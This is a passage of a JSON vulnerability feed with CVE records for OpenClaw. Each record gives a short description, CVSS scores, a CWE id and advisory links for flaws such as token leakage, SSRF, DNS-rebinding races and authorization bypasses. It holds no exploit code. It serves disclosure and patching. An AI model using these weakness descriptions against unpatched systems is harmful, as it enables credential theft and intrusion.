pact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N","baseScore":5.0,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.3,"impactScore":3.6}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Primary","description":[{"lang":"en","value":"CWE-532"}]}],"references":[{"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j4cx-jvq7-79vm","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/openclaw-credential-redaction-bypass-via-trajectory-export","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-62212","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:07.783","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"OpenClaw before 2026.5.28 contains a race condition in the MS Teams safeFetch DNS rebinding check. When the affected feature is enabled and reachable, a lower-trust caller or configured input path could win a timing window between the DNS validation check and use, allowing actions that should have required a stronger authorization or policy check. Practical impact depends on the operator's configuration and whether lower-trust input can reach that path."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"OpenClaw","product":"OpenClaw","defaultStatus":"unaffected","repo":"https://github.com/openclaw/openclaw","packageURL":"pkg:npm/openclaw","versions":[{"version":"0","lessThan":"2026.5.28","versionType":"semver","status":"affected"},{"version":"2026.5.28","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"HIGH","subIntegrityImpact":"LOW","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.8,"impactScore":4.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T14:16:19.700608Z","id":"CVE-2026-62212","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-367"}]}],"references":[{"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wxm8-ghhq-q688","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-safefetch","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-62213","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:07.943","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"OpenClaw versions before 2026.5.27 contain a token leakage vulnerability in MS Teams outbound requests that allows lower-trust callers to expose Bot Framework tokens. Attackers can access configured input paths to retrieve credentials that should remain within the trusted boundary."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"openclaw","product":"msteams","defaultStatus":"unaffected","repo":"https://github.com/openclaw/openclaw","packageURL":"pkg:npm/openclaw/msteams","versions":[{"version":"0","lessThan":"2026.5.27","versionType":"semver","status":"affected"},{"version":"2026.5.27","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.0,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Primary","description":[{"lang":"en","value":"CWE-522"}]}],"references":[{"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v54h-q2vx-vgg4","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/openclaw-token-leakage-via-ms-teams-outbound-requests","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-62214","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:08.097","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"OpenClaw versions before 2026.5.28 Bot Framework contains an improper input validation vulnerability that allows lower-trust callers to expose bot tokens and credentials by failing to properly validate serviceUrl parameters. Attackers can supply malicious serviceUrl values through configured input paths to retrieve sensitive authentication data outside the trusted boundary."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"openclaw","product":"msteams","defaultStatus":"unaffected","repo":"https://github.com/openclaw/openclaw","packageURL":"pkg:npm/openclaw/msteams","versions":[{"version":"0","lessThan":"2026.5.28","versionType":"semver","status":"affected"},{"version":"2026.5.28","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.0,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T10:40:17.454600Z","id":"CVE-2026-62214","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-522"}]}],"references":[{"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-prwc-c6w5-mmgr","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/openclaw-bot-framework-ssrf-via-serviceurl-parameter-validation","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-62215","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:08.243","lastModified":"2026-07-17T19:17:18.087","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"OpenClaw versions before 2026.6.5 contain an authentication bypass vulnerability in HTTP Canvas responses that allows lower-trust callers to forge trusted A2UI actions. Attackers can perform actions requiring stronger authorization by submitting crafted requests through configured input paths, bypassing intended policy checks."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"OpenClaw","product":"OpenClaw","defaultStatus":"unaffected","repo":"https://github.com/openclaw/openclaw","packageURL":"pkg:npm/openclaw","versions":[{"version":"0","lessThan":"2026.6.5","versionType":"semver","status":"affected"},{"version":"2026.6.5","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"ACTIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"HIGH","subIntegrityImpact":"HIGH","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N","baseScore":8.0,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":1.6,"impactScore":5.8}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:32:43.411056Z","id":"CVE-2026-62215","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-345"}]}],"references":[{"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vr7j-7684-7gm5","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-http-canvas","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-62216","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:08.420","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"OpenClaw 2026.4.20 before 2026.5.28 contain a policy bypass in the QQBot media upload feature. A lower-trust caller or configured input path could cause the media upload to reach network destinations that should have been blocked by OpenClaw policy (server-side request forgery). The practical impact depends on the operator's configuration and whether lower-trust input can reach that path."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"OpenClaw","product":"OpenClaw","defaultStatus":"unaffected","repo":"https://github.com/openclaw/openclaw","packageURL":"pkg:npm/openclaw","versions":[{"version":"2026.4.20","lessThan":"2026.5.28","versionType":"semver","status":"affected"},{"version":"2026.5.28","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.3,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"LOW","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N","baseScore":5.0,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.1,"impactScore":1.4}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Primary","description":[{"lang":"en","value":"CWE-918"}]}],"references":[{"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fwgr-fpv9-vf5x","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/openclaw-policy-bypass-via-media-upload","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-62219","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:08.847","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"OpenClaw 2026.2.12 before 2026.5.26 contain an authorization bypass vulnerability in the hooks allowedAgentIds validation. A lower-trust caller or configured input path can bypass agent ID restrictions by submitting blank agent IDs, allowing actions that should require stronger authorization or policy checks."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"OpenClaw","product":"OpenClaw","defaultStatus":"unaffected","repo":"https://github.com/openclaw/openclaw","packageURL":"pkg:npm/openclaw","versions":[{"version":"2026.2.12","lessThan":"2026.5.26","versionType":"semver","status":"affected"},{"version":"2026.5.26","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.0,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":4.2}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"references":[{"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-724r-v4wf-mqc5","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-blank-agent-ids","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-62220","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:08.990","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"OpenClaw 2026.2.25 before 2026.5.26 allow a lower-trust caller or configured input path to bypass non-browser rate limits on WebSocket authentication attempts. When the affected feature is enabled and reachable by lower-trust input, this can consume gateway resources and reduce service availability."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"OpenClaw","product":"OpenClaw","defaultStatus":"unaffected","repo":"https://github.com/openclaw/openclaw","packageURL":"pkg:npm/openclaw","versions":[{"version":"2026.2.25","lessThan":"2026.5.26","versionType":"semver","status":"affected"},{"version":"2026.5.26","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T10:29:36.835808Z","id":"CVE-2026-62220","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-307"}]}],"references":[{"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5p6w-wmh3-frfr","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/openclaw-websocket-rate-limit-bypass","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-62221","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:09.133","lastModified":"2026-07-17T19:17:18.257","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"OpenClaw 2026.5.12 before 2026.5.26 contain an incorrect authorization vulnerability in the ClickClack allowFrom feature. When the affected feature is enabled and reachable, a lower-trust caller or configured input path could execute or persist actions beyond the caller's intended authorization, including running non-allowlisted commands."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"OpenClaw","product":"OpenClaw","defaultStatus":"unaffected","repo":"https://github.com/openclaw/openclaw","packageURL":"pkg:npm/openclaw","versions":[{"version":"2026.5.12","lessThan":"2026.5.26","versionType":"semver","status":"affected"},{"version":"2026.5.26","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.3,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":